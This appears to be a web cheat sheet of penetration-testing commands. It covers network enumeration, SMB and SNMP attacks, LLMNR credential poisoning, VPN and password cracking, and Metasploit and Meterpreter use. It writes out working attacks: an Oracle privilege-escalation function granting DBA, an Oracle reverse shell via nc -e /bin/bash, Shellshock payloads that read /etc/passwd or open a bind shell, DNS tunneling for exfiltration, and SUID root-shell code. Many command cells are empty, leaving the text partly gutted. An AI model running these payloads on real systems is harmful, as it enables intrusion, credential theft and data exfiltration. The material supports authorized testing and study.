Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands you would run when performing a penetration test. For more in depth information I’d recommend the man file for the tool or a more specific pen testing cheat sheet from the menu on the right.
The focus of this cheat sheet is infrastructure / network penetration testing, web application penetration testing is not covered here apart from a few sqlmap commands at the end and some web server enumeration.
17/02/2017 - Article updated, added loads more content, VPN, DNS tunneling, VLAN hopping etc - check out the TOC below.
- Introduction
- Pre-engagement
- DNS Zone Transfers
- Enumeration & Attacking Network Services
- TLS & SSL Testing
- Vulnerability Assessment
- Database Penetration Testing
- Network
- BOF / Exploit
- Exploit Research
- Simple Local Web Servers
- Mounting File Shares
- HTTP / HTTPS Webserver Enumeration
- Packet Inspection
- Username Enumeration
- Passwords
- Brute Forcing Services
- Password Cracking
- Windows Penetration Testing Commands
- Linux Penetration Testing Commands
- Compiling Exploits
- SUID Binary
- Reverse Shells
- TTY Shells
- Metasploit
- Meterpreter Cheat Sheet
- Common Metasploit Modules
- ASCII Table Cheat Sheet
- CISCO IOS Commands
- Cryptography
- SQLMap Examples
Network Configuration
Set IP Address
ifconfig eth0
Passive Information Gathering
WHOIS enumeration
Perform DNS IP Lookup
dig a @nameserver
Perform MX Record Lookup
dig mx @nameserver
Perform Zone Transfer with DIG
dig axfr @nameserver
DNS Zone Transfers
Command | Description |
Windows DNS zone transfer |
Linux DNS zone transfer |
Simply Email
Use Simply Email to enumerate all the online places (github, target site etc), it works better if you use proxies or set long throttle times so google doesn’t think you’re a robot and make you fill out a Captcha.
git clone
./ -all -e TARGET-DOMAIN
Simply Email can verify the discovered email addresss after gathering.
Semi Active Information Gathering
Basic Finger Printing
Manual finger printing / banner grabbing.
Command | Description |
Basic versioning / finger printing via displayed banner |
Banner grabbing with NC
GET / HTTP/1.1
User-Agent: Mozilla/5.0
Referrer: meh-domain
Active Information Gathering
DNS Bruteforce
DNS Enumeration Kali - DNSRecon
root:~# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
Port Scanning
Nmap Commands
For more commands, see the Nmap cheat sheet (link in the menu on the right).
Basic Nmap Commands:
Command | Description |
Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services |
As above but scans all TCP ports (takes a lot longer) |
As above but scans all TCP ports and UDP scan (takes even longer) |
Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may cause knockover |
Search nmap scripts for keywords |
Nmap UDP Scanning
nmap -sU TARGET
UDP Protocol Scanner
git clone
Scan a file of IP addresses for all services:
./ -f ip.txt
Scan for a specific UDP service: -p ntp -f ips.txt
Other Host Discovery
Other methods of host discovery, that don’t use nmap…
Command | Description |
Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site |
Enumeration & Attacking Network Services
Tools that will spefically identify and / or enumerate network services:
SAMB / SMB / Windows Domain Enumeration
Samba Enumeration
SMB Enumeration Tools
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
Also see, nbtscan cheat sheet (right hand menu).
Command | Description |
Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain |
Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing |
Fingerprint SMB Version
smbclient -L //
Find open SMB Shares
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445
Enumerate SMB Users
nmap -sU -sS --script=smb-enum-users -p U:137,T:139
python /usr/share/doc/python-impacket-doc/examples
/ 192.168.XXX.XXX
RID Cycling: 192.168.XXX.XXX 500 50000 dict.txt
Metasploit module for RID cycling:
use auxiliary/scanner/smb/smb_lookupsid
Manual Null session testing:
net use \\TARGET\IPC$ "" /u:""
smbclient -L //
NBTScan unixwiz
Install on Kali rolling:
apt-get install nbtscan-unixwiz
nbtscan-unixwiz -f > nbtscan
LLMNR / NBT-NS Spoofing
Steal credentials off the network.
Metasploit LLMNR / NetBIOS requests
Spoof / poison LLMNR / NetBIOS requests:
Capture the hashes:
You’ll end up with NTLMv2 hash, use john or hashcat to crack it.
Alternatively you can use responder.
git clone
python -i local-ip -I eth0
Run for the whole engagement
Run for the length of the engagement while you're working on other attack vectors.
SNMP Enumeration
Fix SNMP output values so they are human readable:
apt-get install snmp-mibs-downloader download-mibs
echo "" > /etc/snmp/snmp.conf
Command | Description |
SNMP enumeration |
SNMPv3 Enumeration
Idenitfy SNMPv3 servers with nmap:
nmap -sV -p 161 --script=snmp-info TARGET-SUBNET
Rory McCune’s snmpwalk wrapper script helps automate the username enumeration process for SNMPv3:
apt-get install snmp snmp-mibs-downloader
Use Metasploits Wordlist
Metasploit's wordlist (KALI path below) has common credentials for v1 & 2 of SNMP, for newer credentials check out Daniel Miessler's SecLists project on GitHub (not the mailing list!).
R Services Enumeration
This is legacy, included for completeness.
nmap -A will perform all the rservices enumeration listed below, this section has been added for completeness or manual confirmation:
RSH Enumeration
RSH Run Commands
rsh <target> <command>
Metasploit RSH Login Scanner
rusers Show Logged in Users
rusers -al
rusers scan whole Subnet
rlogin -l <user> <target>
e.g rlogin -l root TARGET-SUBNET/24
Finger Enumeration
finger @TARGET-IP
Finger a Specific Username
finger [email protected]
Solaris bug that shows all logged in users:
finger [email protected]
SunOS: RPC services allow user enum:
$ rusers # users logged onto LAN
finger 'a b c d e f g [email protected]
Use nmap to identify machines running rwhod (513 UDP)
TLS & SSL Testing
Test all the things on a single host and output to a .html file:
./ -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html
Vulnerability Assessment
Install OpenVAS 8 on Kali Rolling:
apt-get update
apt-get dist-upgrade -y
apt-get install openvas
Verify openvas is running using:
netstat -tulpn
Login at - credentials are generated during openvas-setup.
Database Penetration Testing
Attacking database servers exposed on the network.
Install oscanner:
apt-get install oscanner
Run oscanner:
oscanner -s -P 1521
Fingerprint Oracle TNS Version
Install tnscmd10g:
apt-get install tnscmd10g
Fingerprint oracle tns:
tnscmd10g version -h TARGET
nmap --script=oracle-tns-version
Brute force oracle user accounts
Identify default Oracle accounts:
nmap --script=oracle-sid-brute
nmap --script=oracle-brute
Run nmap scripts against Oracle TNS:
nmap -p 1521 -A TARGET
Oracle Privilege Escalation
- Oracle needs to be exposed on the network
- A default account is in use like scott
Quick overview of how this works:
- Create the function
- Create an index on table SYS.DUAL
- The index we just created executes our function SCOTT.DBA_X
- The function will be executed by SYS user (as that’s the user that owns the table).
- Create an account with DBA priveleges
In the example below the user SCOTT is used but this should be possible with another default Oracle account.
Identify default accounts within oracle db using NMAP NSE scripts:
nmap --script=oracle-sid-brute
nmap --script=oracle-brute
Login using the identified weak account (assuming you find one).
How to identify the current privilege level for an oracle user:
SQL> select * from session_privs;
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid
curren_user is
pragma autonomous_transaction;
execute immediate 'grant dba to user1 identified by pass1';
return 'FOO';
Oracle priv esc and obtain DBA access:
Run netcat: netcat -nvlp 443
SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));
Run the exploit with a select query:
SQL> Select * from session_privs;
You should have a DBA user with creds user1 and pass1.
Verify you have DBA privileges by re-running the first command again.
Remove the exploit using:
drop index exploit_1337;
Get Oracle Reverse os-shell:
dbms_scheduler.create_job( job_name => 'MEH1337',job_type =>
'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date =>
SYSTIMESTAMP,enabled => FALSE,auto_drop => TRUE);
dbms_scheduler.set_job_argument_value('rev_shell', 1, 'TARGET-IP');
dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');
dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');
dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');
Enumeration / Discovery:
nmap -sU --script=ms-sql-info
msf > use auxiliary/scanner/mssql/mssql_ping
Use MS SQL Servers Browse For More
Try using "Browse for More" via MS SQL Server Management Studio
Bruteforce MSSQL Login
msf > use auxiliary/admin/mssql/mssql_enum
Metasploit MSSQL Shell
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
Plink.exe Tunnel
PuTTY Link tunnel
Forward remote port to local address:
plink.exe -P 22 -l root -pw "1337" -R 445: REMOTE-IP
SSH Pivoting
ssh -D -p 22 [email protected]
Add socks4 1010 in /etc/proxychains.conf
SSH pivoting from one network to another:
ssh -D -p 22 [email protected]
Add socks4 1010 in /etc/proxychains.conf
proxychains ssh -D -p 22 [email protected]
Add socks4 1011 in /etc/proxychains.conf
Meterpreter Pivoting
TTL Finger Printing
Operating System | TTL Size |
Windows |
Linux |
Solaris |
Cisco / Network |
IPv4 Cheat Sheets
Classful IP Ranges
E.g Class A,B,C (depreciated)
Class | IP Address Range |
Class A IP Address Range |
Class B IP Address Range |
Class C IP Address Range |
Class D IP Address Range |
Class E IP Address Range |
IPv4 Private Address Ranges
Class | Range |
Class A Private Address Range |
Class B Private Address Range |
Class C Private Address Range |
IPv4 Subnet Cheat Sheet
CIDR | Decimal Mask | Number of Hosts |
/31 |
/30 |
/29 |
/28 |
/27 |
/26 |
/25 |
/24 |
/23 |
/22 |
/21 |
/20 |
/19 |
/18 |
/17 |
/16 |
/15 |
/14 |
/13 |
/12 |
/11 |
/10 |
/9 |
/8 |
VLAN Hopping
Using NCCGroups VLAN wrapper script for Yersina simplifies the process.
git clone
chmod 700
VPN Hacking
Identify VPN servers:
./ -p ike TARGET(s)
Scan a range for VPN servers:
./ -p ike -f ip.txt
Use IKEForce to enumerate or dictionary attack VPN servers.
pip install pyip
git clone
Perform IKE VPN enumeration with IKEForce:
./ TARGET-IP –e –w wordlists/groupnames.dic
Bruteforce IKE VPN using IKEForce:
./ TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
IKE Aggressive Mode PSK Cracking
- Identify VPN Servers
- Enumerate with IKEForce to obtain the group ID
- Use ike-scan to capture the PSK hash from the IKE endpoint
- Use psk-crack to crack the hash
Step 1: Idenitfy IKE Servers
./ -p ike SUBNET/24
Step 2: Enumerate group name with IKEForce
./ TARGET-IP –e –w wordlists/groupnames.dic
Step 3: Use ike-scan to capture the PSK hash
ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP
Step 4: Use psk-crack to crack the PSK hash
psk-crack hash-file.txt
Some more advanced psk-crack options below:
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
PPTP Hacking
Identifying PPTP, it listens on TCP: 1723
NMAP PPTP Fingerprint:
nmap –Pn -sV -p 1723 TARGET(S)
PPTP Dictionary Attack
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
DNS Tunneling
Tunneling data over DNS to bypass firewalls.
dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.
Attacking Machine
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone
cd dnscat2/server
bundle install
Run dnscat2:
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422
Target Machine:
dnscat --host <dnscat server_ip>
BOF / Exploit
Exploit Research
Find exploits for enumerated hosts / services.
Command | Description |
Search exploit-db for exploit, in this example windows 2003 + local esc |
Use google to search for exploits |
Search metasploit modules using grep - msf search sucks a bit |
Searching for Exploits
Install local copy of exploit-db:
searchsploit –u
searchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
Compiling Windows Exploits on Kali
wget -O mingw-get-setup.exe
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget && unzip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
Cross Compiling Exploits
gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)
Exploiting Common Vulnerabilities
Exploiting Shellshock
A tool to find and exploit servers vulnerable to Shellshock:
git clone
./ -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
cat file (view file contents)
echo -e
"HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo
\$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" |
nc TARGET 80
Shell Shock run bind shell
echo -e
"HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l
-p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" |
nc TARGET 80
Shell Shock reverse Shell
nc -l -p 443
Simple Local Web Servers
Python local web server command, handy for serving up shells and exploits on an attacking machine.
Command | Description |
Run a basic http server, great for serving up shells etc |
Run a basic Python3 http server, great for serving up shells etc |
Run a ruby webrick basic http server |
Run a basic PHP http server |
Mounting File Shares
How to mount NFS / CIFS, Windows and Linux file shares.
Command | Description |
Mount NFS share to |
Mount Windows CIFS / SMB share on Linux at |
Mount a Windows share on Windows from the command line |
Install smb4k on Kali, useful Linux GUI for browsing SMB shares |
HTTP / HTTPS Webserver Enumeration
Command | Description |
Perform a nikto scan against target |
Configure via GUI, CLI input doesn't work most of the time |
Packet Inspection
Command | Description |
tcpdump for port 80 on interface eth0, outputs to output.pcap |
Username Enumeration
Some techniques used to remotely enumerate users on a target system.
SMB User Enumeration
Command | Description |
Enumerate users from SMB |
RID cycle SMB / enumerate users from SMB |
SNMP User Enumeration
Command | Description |
Enmerate users from SNMP |
Enmerate users from SNMP |
Search for SNMP servers with nmap, grepable output |
Command | Description |
Kali word lists |
Brute Forcing Services
Hydra FTP Brute Force
Command | Description |
Hydra FTP brute force |
Hydra POP3 Brute Force
Command | Description |
Hydra POP3 brute force |
Hydra SMTP Brute Force
Command | Description |
Hydra SMTP brute force |
Use -t
to limit concurrent connections, example: -t 15
Password Cracking
John The Ripper - JTR
Command | Description |
JTR password cracking |
JTR forced descrypt cracking with wordlist |
JTR forced descrypt brute force cracking |
Windows Penetration Testing Commands
See Windows Penetration Testing Commands.
Linux Penetration Testing Commands
See Linux Commands Cheat Sheet (right hand menu) for a list of Linux Penetration testing commands, useful for local system enumeration.
Compiling Exploits
Some notes on compiling exploits.
Identifying if C code is for Windows or Linux
C #includes will indicate which OS should be used to build the exploit.
Command | Description |
Windows exploit code |
Linux exploit code |
Build Exploit GCC
Compile exploit gcc.
Command | Description |
Basic GCC compile |
GCC Compile 32Bit Exploit on 64Bit Kali
Handy for cross compiling 32 bit binaries on 64 bit attacking machines.
Command | Description |
Cross compile 32 bit binary on 64 bit Linux |
Compile Windows .exe on Linux
Build / compile windows exploits on Linux, resulting in a .exe file.
Command | Description |
Compile windows .exe on Linux |
SUID Binary
Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.
below are some quick copy and pate examples for various shells:
SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
Reverse Shells
See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.
TTY Shells
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su
from reverse shells.
Python TTY Shell Trick
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
Spawn Interactive sh shell
/bin/sh -i
Spawn Perl TTY Shell
exec "/bin/sh";
perl —e 'exec "/bin/sh";'
Spawn Ruby TTY Shell
exec "/bin/sh"
Spawn Lua TTY Shell
Spawn TTY Shell from Vi
Run shell commands from vi:
Spawn TTY Shell NMAP
Some basic Metasploit stuff, that I have found handy for reference.
Basic Metasploit commands, useful for reference, for pivoting see - Meterpreter Pivoting techniques.
Meterpreter Payloads
Windows reverse meterpreter payload
Command | Description |
Windows reverse tcp payload |
Windows VNC Meterpreter payload
Command | Description |
Meterpreter Windows VNC Payload |
Linux Reverse Meterpreter payload
Command | Description |
Meterpreter Linux Reverse Payload |
Meterpreter Cheat Sheet
Useful meterpreter commands.
Command | Description |
Meterpreter upload file to Windows target |
Meterpreter download file from Windows target |
Meterpreter download file from Windows target |
Meterpreter run .exe on target - handy for executing uploaded exploits |
Creates new channel with cmd shell |
Meterpreter show processes |
Meterpreter get shell on the target |
Meterpreter attempts priviledge escalation the target |
Meterpreter attempts to dump the hashes on the target |
Meterpreter create port forward to target machine |
Meterpreter delete port forward |
Common Metasploit Modules
Top metasploit modules.
Remote Windows Metasploit Modules (exploits)
Command | Description |
MS08_067 Windows 2k, XP, 2003 Remote Exploit |
MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit |
MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit |
Local Windows Metasploit Modules (exploits)
Command | Description |
Bypass UAC on Windows 7 + Set target + arch, x86/64 |
Auxilary Metasploit Modules
Command | Description |
Metasploit HTTP directory scanner |
Metasploit JBOSS vulnerability scanner |
Metasploit MSSQL Credential Scanner |
Metasploit MSSQL Version Scanner |
Metasploit Oracle Login Module |
Metasploit Powershell Modules
Command | Description |
Metasploit powershell payload delivery module |
Metasploit upload and run powershell script through a session |
Metasploit JBOSS deploy |
Metasploit MSSQL payload |
Post Exploit Windows Metasploit Modules
Windows Metasploit Modules for privilege escalation.
Command | Description |
Metasploit show privileges of current user |
Metasploit grab GPP saved passwords |
Metasplit load Mimikatz |
Idenitfy other machines that the supplied domain user has administrative access to |
Automated dumping of sam file, tries to esc privileges etc |
ASCII Table Cheat Sheet
Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.
ASCII | Character |
Null Byte |
BS |
LF |
CR |
! |
" |
# |
$ |
% |
& |
` |
( |
) |
* |
+ |
, |
- |
. |
/ |
0 |
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
: |
; |
< |
= |
> |
? |
@ |
A |
B |
C |
D |
E |
F |
G |
H |
I |
J |
K |
L |
M |
N |
O |
P |
Q |
R |
S |
T |
U |
V |
W |
X |
Y |
Z |
[ |
\ |
] |
^ |
_ |
` |
a |
b |
c |
d |
e |
f |
g |
h |
i |
j |
k |
l |
m |
n |
o |
p |
q |
r |
s |
t |
u |
v |
w |
x |
y |
z |
CISCO IOS Commands
A collection of useful Cisco IOS commands.
Command | Description |
Enters enable mode |
Short for, configure terminal |
Configure FastEthernet 0/0 |
Add ip to fa0/0 |
Add ip to fa0/0 |
Configure vty line |
Cisco set telnet password |
Set telnet password |
Show running config loaded in memory |
Show sartup config |
show cisco IOS version |
display open sessions |
Show network interfaces |
Show detailed interface info |
Show routes |
Show access lists |
Show available files |
File information |
SHow deleted files |
No limit on terminal output |
Copys running config to tftp server |
Copy startup-config to running-config |
Hash Lengths
Hash | Size |
MD5 Hash Length |
SHA-1 Hash Length |
SHA-256 Hash Length |
SHA-512 Hash Length |
Hash Examples
Likely just use hash-identifier for this but here are some example hashes:
Hash | Example |
MD5 Hash Example |
MD5 $PASS:$SALT Example |
SHA1 Hash Example |
SHA-256 |
SHA-512 |
NTLM Hash Example |
SQLMap Examples
Command | Description |
Automated sqlmap scan |
Targeted sqlmap scan |
Scan url for union + error based injection with mysql backend |
sqlmap check form for injection |
sqlmap dump and crack hashes for table users on database-name. |